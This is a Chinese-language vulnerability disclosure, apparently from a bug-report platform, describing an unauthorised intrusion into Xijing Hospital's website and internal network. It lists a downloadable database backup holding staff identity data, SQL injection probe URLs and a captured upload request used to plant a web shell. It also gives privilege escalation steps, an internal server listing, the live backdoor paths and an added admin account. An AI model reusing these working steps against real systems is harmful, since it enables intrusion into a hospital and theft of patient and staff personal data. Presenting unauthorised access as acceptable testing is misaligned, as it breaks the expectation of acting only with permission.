西京医院可从web入侵到内网渗透
首先是数据库备份文件可被下载
链接:
<code>http://xjwww.fmmu.edu.cn/D.rar</code>
我看了下,虽然是很早的数据,但是还是有些信息,各种小护士联系电话,身份证号,住址,姓名.而且对下一步的渗透也埋下了伏笔
第二处就是主站存在明显注入:
漏洞链接:
<code>http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1</code>
加单引号爆错,并且爆出了绝对路径
<code>Microsoft JET Database Engine 错误 '80040e14'</p><p> 语法错误 (操作符丢失) 在查询表达式 'uid=1' and sh='1' ORDER BY time DESC' 中,西京医院可从web入侵到内网渗透
。</p><p> D:\西京医院主站20130718\BZXXQ\../inc/cls_main.asp,行 303</code>
进一步确定存在注入
http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1 and 1=1
http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1 and 1=2
返回结果不同,存在sql注射,刚才我们也得到了数据库结构,所以呢,数据库的所有东西已经一目了然了
第三处问题存在上传漏洞,这个更是致命的,直接getshell
问题链接:
<code>http://xjwww.fmmu.edu.cn/Talents/base/fj_upload.asp</code>
上传用burp抓包,分析post包,可以看到,对filepath是可控的,由于站点web容器为iis6,所以结合iis6解析漏洞,可以直接getshell
<code>POST /Talents/base/fj_upfile.asp HTTP/1.1</p><p> Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*</p><p> DNT: 1</p><p> Referer: http://xjwww.fmmu.edu.cn/Talents/base/fj_upload.asp</p><p> Accept-Language: zh-cn</p><p> User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)</p><p> Content-Type: multipart/form-data; boundary=---------------------------7de3992b201b6</p><p> Accept-Encoding: gzip, deflate</p><p> Proxy-Connection: Keep-Alive</p><p> Content-Length: 5402</p><p> Host: xjwww.fmmu.edu.cn</p><p> Pragma: no-cache</p><p> Cookie: _pk_id.46.8753=003ff2d41d9fcfc8.1396338965.1.1396341021.1396338965.; _pk_ses.46.8753=*; CNZZDATA2369866=cnzz_eid%3D472799282-1396338970-%26ntime%3D1396338970%26cnzz_a%3D5%26ltime%3D1396338964750; ASPSESSIONIDSSBBRBDQ=FPFHAHDBMBBCPEOHELFHGLMH</p><p> -----------------------------7de3992b201b6</p><p> Content-Disposition: form-data; name="filepath"</p><p> /UploadFile/</p><p> -----------------------------7de3992b201b6</p><p> Content-Disposition: form-data; name="act"</p><p> upload</p><p> -----------------------------7de3992b201b6</p><p> Content-Disposition: form-data; name="file1"; filename="a.jpg"</p><p> Content-Type: image/gif</code>
修改post包,上传shell
查看源码得到shell地址上菜刀
简单提权,得到服务器权限
<code>服务器名称 注释</p><p> -------------------------------------------------------------------------------</p><p> \\BLBSJYS-WEB2072</p><p> \\CLOUD-SQL2008R2 VMware vSphere Database</p><p> \\CLOUD-VCENTER VMware vSphere vCenter</p><p> \\CSK-WEB207197</p><p> \\FMHZL-WEB fmhzl-web</p><p> \\FSK-WEB207198</p><p> \\GK-WEB207203</p><p> \\GXGL-WEB 肝血管瘤</p><p> \\HXK-WEB207204</p><p> \\HYX-WEB207199</p><p> \\JYK-WEB207205</p><p> \\JYKSYJPKC-WEB20</p><p> \\LLK-WEB207201</p><p> \\LNBK-WEB207200</p><p> \\MNWK-WEB207207</p><p> \\MZK-WEB207206</p><p> \\NFMK-WEB207196</p><p> \\PFYY-WEB207215</p><p> \\RBH-WEB207222</p><p> \\RK-WEB207195</p><p> \\SHARE-SERVER</p><p> \\SXK-WEB207201</p><p> \\SZNK-WEB207197</p><p> \\XGNFMWK-WEB2072</p><p> \\XHWK-WEB207200</p><p> \\XJFCK-WEB</p><p> \\XJHYX-WEB</p><p> \\XJMZK-WEB</p><p> \\XJSSK-WEB</p><p> \\XJYY-WEB207193</p><p> \\XJYYB-WEB207194</p><p> \\XJZLK-WEB207196</p><p> \\XJZYZ-WEB207195</p><p> \\XSK-WEB207208</p><p> \\XXGWK-WEB207202</p><p> \\YJK-CHINESE-WEB</p><p> \\YJK-ENGLISH-WEB</p><p> \\YJK-WEB207198</p><p> \\YK-WEB207210</p><p> \\ZLFSZX-WEB20721</p><p> \\ZXWK-WEB207212</p><p> \\ZYK-WEB</p><p> \\绿盟服务器25510</code>
内网机器可能不止这些,不过如果要是继续下去,各种病人,医院工作人员的个人信息很可能会泄漏,希望能引起重视,另外发现别人的后门
http://xjwww.fmmu.edu.cn/x.asp
本次测试上传后门:
http://xjwww.fmmu.edu.cn/UploadFile/1.asp;20144117046.gif
http://xjwww.fmmu.edu.cn/asp/help.asp
添加管理帐号 test test
原谅我未授权就检测!!!
修复方案:
各种修复把!安全实在不敢恭维,